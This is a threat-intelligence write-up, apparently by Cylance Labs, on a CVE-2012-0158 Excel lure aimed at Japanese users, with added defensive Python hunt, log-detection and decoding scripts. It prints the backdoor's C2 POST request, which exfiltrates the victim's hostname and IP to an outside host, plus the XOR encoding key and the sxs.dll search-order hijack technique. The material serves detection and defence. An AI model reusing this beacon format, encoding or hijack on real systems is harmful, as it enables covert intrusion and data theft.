Japan Targeted Perhaps Over Senkaku/Diaoyu Island Dispute

Over the past few weeks Cylance Labs identified a surge in targeted documents against Japanese users. These documents coincide perfectly with world news concerning recent escalating tensions between China and Japan over the disputed Senkaku/Diaoyu Islands. These files are being sent regularly to a number of different users and industries using a variety of old and new exploits. China often denies any involvement in ongoing cyber attacks; however, the ongoing dispute between the two countries has raised nationalistic pride on both sides and put the countries on edge.

We have decided to share some of our findings in hopes of empowering defenders to protect their systems.

Meta Information:

Filename: keikaku-201302.xls (translates as “Plan-201302”)
MD5: 7ec89be945add54aa67009dbc12a9260
SHA1: 1434a04f10c2162eab82703ef79e407dcbf5c30f
SHA256: 6d7b9f15cd8e3e75295e1c5ca46a3610e0e22b45d7bea18444b1f54e127131d0
FileSize: 172,564 Bytes

Document Structure Summary Information:

Operating System Version: 5.1
Size: 12713 Bytes
'Root Entry' (root) 8192 bytes {00020820-0000-0000-C000-000000000046}
'\x01CompObj' (stream) 112 bytes
'\x05DocumentSummaryInformation' (stream) 72 bytes
'Workbook' (stream) 4733 bytes
'_VBA_PROJECT_CUR' (storage)
'PROJECT' (stream) 424 bytes
'PROJECTwm' (stream) 62 bytes
'VBA' (storage)
'Sheet1' (stream) 1066 bytes
'ThisWorkbook' (stream) 985 bytes
'_VBA_PROJECT' (stream) 2933 bytes
'dir' (stream) 804 bytes
'encryption' (stream) 1522 bytes

File Details:

The file was targeted at Japanese users and exploits CVE-2012-0158, which was first used in the wild in April of 2012. The binary is encoded within the document with a single-byte XOR key of 0x12, and the encoding skips the first byte of the binary (0x4D). An empty dummy document is also decoded and loaded upon successful exploitation; it is stored at file offset 0x23C14 with the single-byte XOR key of 0x97.

Dropper Details:

FileSize: 153,600 Bytes
MD5: C266FAA587136328C939D2BB25EA7D42

The interesting facet of this particular sample is that the decoded binary does nothing but create the file “C:\Program Files\Internet Explorer\sxs.dll”. The “sxs.dll” file is stored within the dropper as a resource named “DATA” with a Chinese code page (2052). The backdoor takes advantage of a vulnerability known as DLL search order hijacking: when Internet Explorer is executed, it first loads the “sxs.dll” file in its own directory rather than the legitimate “sxs.dll” file in the system32 directory, “%systemroot%\system32\”. So any file named “sxs.dll” in the same directory as the “iexplore.exe” binary will most likely be malicious in any future encounters. Investigators should add this to the list of known DLL search order hijacking locations, which includes %systemroot%\ntshrui.dll, %systemroot%\fxsst.dll, %systemroot%\linkinfo.dll, and %systemroot%\midimap.dll.
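A small hunt script for the hijack location above, added here as an example and not part of the Cylance write-up: it checks the Internet Explorer directory and %systemroot% for the DLL names listed, hashes any hit, and flags the known sxs.dll MD5. The directory list and the check-only-the-top-level rule are the author's assumptions.

```python
import hashlib
import os
from pathlib import Path

# MD5 of the malicious sxs.dll reported above (compared case-insensitively).
KNOWN_BAD_MD5 = {"653c8aeae41f0a008e3d31c13d92a038"}
# sxs.dll beside iexplore.exe (this sample) plus the other search-order
# hijacking names the report lists directly under %systemroot%.
HIJACK_DLL_NAMES = {"sxs.dll", "ntshrui.dll", "fxsst.dll", "linkinfo.dll", "midimap.dll"}
# Assumed default directories on a Windows host; os.path.expandvars
# resolves the %VAR% form only on Windows.
DEFAULT_DIRS = [r"%ProgramFiles%\Internet Explorer", r"%SystemRoot%"]


def md5_file(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_dirs(dirs, known_bad=KNOWN_BAD_MD5):
    """Return (path, md5, is_known_bad) for each file with a hijack DLL name
    found directly inside the given directories. Only the top level is checked:
    the legitimate copies live in system32, so a copy one level up is the anomaly."""
    findings = []
    for d in dirs:
        folder = Path(os.path.expandvars(str(d)))
        if not folder.is_dir():
            continue
        for entry in folder.iterdir():
            if entry.is_file() and entry.name.lower() in HIJACK_DLL_NAMES:
                digest = md5_file(entry)
                findings.append((str(entry), digest, digest in known_bad))
    return findings


if __name__ == "__main__":
    for path, digest, bad in scan_dirs(DEFAULT_DIRS):
        print(("KNOWN BAD " if bad else "REVIEW    ") + path + "  md5=" + digest)
```

Any hit that is not the known hash still deserves review, since a replaced DLL in one of these locations is suspicious regardless of its hash.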

Backdoor Details:

FileSize: 78,336 Bytes
MD5: 653C8AEAE41F0A008E3D31C13D92A038

When Internet Explorer is executed, the file is loaded into the process’s address space and creates a mutex named “myhorse_ie_001”. The backdoor exports a function named “fuc_trend”.

NETWORK-BASED INDICATORS:

  • The malware will make DNS requests for “www.dotaplayers.com” which appears to be a legitimate small website hosting company.
  • The malware communicates over TCP port 80 using HTTP requests similar to the ones below.

POST /jd/upload.aspx?filepath=info&filename={Hostname}_{IP}.jpg HTTP/1.1
Host: www.dotaplayers.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
Content-Type: multipart/form-data
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cache-Control: no-cache
User-Agent: MyAgent
Content-Length: 3112

Where {Hostname} is the hostname of the victim system and {IP} is the IP address of the system. The backdoor will also use the User-Agent “mydownload” when downloading files from the C2 server.
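Detection logic for the network indicators above, run over constructed proxy log lines; this is an added example, not code from Cylance. The log line format, the sample entries and the download path are the author's assumptions. It scores the static User-Agents and the upload URI as detections on their own, treats the domain only as corroboration (the report notes it looks like a legitimate hosting provider), and pulls the victim hostname and IP that the filename parameter leaks.

```python
import re

C2_HOST = "www.dotaplayers.com"
SUSPECT_AGENTS = {"MyAgent", "mydownload"}
# Beacon URI: /jd/upload.aspx?filepath=info&filename={Hostname}_{IP}.jpg
UPLOAD_URI = re.compile(
    r"^/jd/upload\.aspx\?filepath=info&filename="
    r"(?P<host>[^&_]+)_(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\.jpg$"
)
# Constructed log format: timestamp src_ip method host uri "user-agent"
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Constructed sample: a beacon, a download, benign traffic, and benign
# browsing to the C2 host (a real hosting provider) that must not fire.
SAMPLE_LOG = """\
2013-02-11T09:12:01 10.0.0.5 POST www.dotaplayers.com /jd/upload.aspx?filepath=info&filename=WS-TOKYO01_10.0.0.5.jpg "MyAgent"
2013-02-11T09:12:09 10.0.0.5 GET www.dotaplayers.com /jd/PLACEHOLDER.bin "mydownload"
2013-02-11T09:13:44 10.0.0.7 GET www.example.com /index.html "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
2013-02-11T09:14:02 10.0.0.9 GET www.dotaplayers.com /news.html "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
"""


def classify(line):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ts, src, method, host, uri, ua = m.groups()
    reasons, victim = [], None
    if ua in SUSPECT_AGENTS:
        reasons.append("user-agent " + ua)
    u = UPLOAD_URI.match(uri)
    if method == "POST" and u:
        reasons.append("upload beacon")
        victim = (u.group("host"), u.group("ip"))  # leaked in the filename
    # A hit on the domain alone is corroboration, not a detection.
    if host == C2_HOST and reasons:
        reasons.append("known C2 host")
    if not reasons:
        return None
    return {"ts": ts, "src": src, "reasons": reasons, "victim": victim,
            "src_matches_victim": victim is not None and victim[1] == src}


def scan(log_text):
    return [f for f in map(classify, log_text.splitlines()) if f]
```

The src_matches_victim flag is a quick sanity check for the analyst: when the source address of the POST differs from the IP embedded in the filename, the host is probably behind NAT or a proxy and the embedded value is the one to search for internally.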

HOST-BASED INDICATORS:

  • The malware will create the file “%temp%\tmp.dat” and gather basic system information before encoding and sending it in the body of the POST request.
  • The malware may also create the following files in the %temp% directory:
      • cmd{decimal value}.dat
      • msuc.dat
      • order.dat
      • tmpxor.dat

HostName: {Hostname}
IP: {IP}
Proxy: (null)
User: Administrator
SystemDir: C:\WINDOWS\system32
OS Language Version: 437
System Version: 5.1 Service Pack 3 (Build 2600)

Process:
ID: 4 (?)
ID: 472 (\SystemRoot\System32\smss.exe)
ID: 888 (\??\C:\WINDOWS\system32\winlogon.exe)
ID: 932 (C:\WINDOWS\system32\services.exe)
ID: 944 (C:\WINDOWS\system32\lsass.exe)
ID: 1100 (C:\WINDOWS\system32\svchost.exe)
ID: 1364 (C:\WINDOWS\System32\svchost.exe)
ID: 1888 (C:\WINDOWS\Explorer.EXE)
ID: 188 (C:\WINDOWS\system32\spoolsv.exe)
ID: 400 (C:\Program Files\Parallels\Parallels Tools\Services\coherence.exe)
ID: 424 (C:\Program Files\Parallels\Parallels Tools\Services\prl_tools_service.exe)
ID: 536 (C:\Program Files\Parallels\Parallels Tools\Services\prl_tools.exe)
ID: 596 (C:\WINDOWS\system32\svchost.exe)
ID: 1572 (C:\Program Files\Parallels\Parallels Tools\prl_cc.exe)
ID: 1592 (C:\WINDOWS\system32\ctfmon.exe)
ID: 1656 (C:\WINDOWS\system32\wscntfy.exe)
ID: 3284 (C:\Program Files\Sandboxie\SbieSvc.exe)
ID: 2052 (C:\Program Files\Sandboxie\SbieCtrl.exe)
ID: 2744 (C:\WINDOWS\system32\cmd.exe)
ID: 868 (C:\Python26\python.exe)
ID: 3560 (C:\Program Files\Internet Explorer\iexplore.exe)
ID: 1688 (C:\Program Files\Internet Explorer\iexplore.exe)

Figure 1: Example contents of "tmp.dat"

Data like that shown in the figure above is first converted to Unicode and then encoded with XOR against the key “*&~^%@0hh8979” before being sent to the C2 server.
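A decoder for the tmp.dat beacon body described above, added as an example and not taken from the report. It assumes “Unicode” means UTF-16LE (the Windows wide-character encoding) and that the 13-byte key is applied cyclically starting at the first byte of the data; the sample content is constructed in the layout of Figure 1. It also shows the known-plaintext check an analyst can use to confirm the key from a captured POST body, since every tmp.dat starts with “HostName: ”.

```python
import re

KEY = b"*&~^%@0hh8979"  # XOR key named in the report


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with key, cycling the key (assumed to start at byte 0)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_beacon(text: str) -> bytes:
    # Assumption: "Unicode" means UTF-16LE, the Windows wide-char encoding.
    return xor_repeating(text.encode("utf-16-le"), KEY)


def decode_beacon(blob: bytes) -> str:
    return xor_repeating(blob, KEY).decode("utf-16-le")


def recover_key(blob: bytes, known_plain: str, key_len: int) -> bytes:
    """Known-plaintext check: tmp.dat always opens with 'HostName: ', so
    ciphertext XOR plaintext yields the key stream, which repeats every key_len bytes."""
    kp = known_plain.encode("utf-16-le")
    if len(kp) < key_len:
        raise ValueError("known plaintext shorter than the key")
    return xor_repeating(blob[:len(kp)], kp)[:key_len]


def parse_fields(text: str) -> dict:
    """Collect the 'Name: value' header lines of decoded tmp.dat content,
    stopping at the process list."""
    fields = {}
    for line in text.splitlines():
        if line.startswith("Process:"):
            break
        m = re.match(r"^([^:]+): (.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


# Constructed tmp.dat content in the layout of Figure 1 (values made up).
SAMPLE_TMP_DAT = (
    "HostName: WS-TOKYO01\r\nIP: 10.0.0.5\r\nProxy: (null)\r\n"
    "User: Administrator\r\nSystemDir: C:\\WINDOWS\\system32\r\n"
    "OS Language Version: 437\r\nSystem Version: 5.1 Service Pack 3 (Build 2600)\r\n"
    "\r\nProcess:\r\nID: 4 (?)\r\nID: 472 (\\SystemRoot\\System32\\smss.exe)\r\n"
)
```

If recover_key returns something other than the reported key on a real capture, the body is probably wrapped in multipart encoding or the key alignment differs, so strip the form boundary first before re-checking.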

Conclusion

The network traffic for this specific trojan can readily be identified from the static User-Agents used within the code, including “MyAgent” and “mydownload”. While these attacks appear to be limited in scope, this novel persistence method will undoubtedly be applied in future malicious endeavors by the attackers. Investigators should treat any file named “sxs.dll” in the same directory as Internet Explorer as suspect and examine it carefully.

Users are encouraged to be wary of any attachments received using a “.doc” or “.xls” extension. Modern versions of Microsoft Office (2007+) will by default save documents using the newer Office Open XML format with a “.docx” or “.xlsx” extension. Cylance Labs has yet to identify a malicious Office document in these attacks that takes advantage of the OOXML format.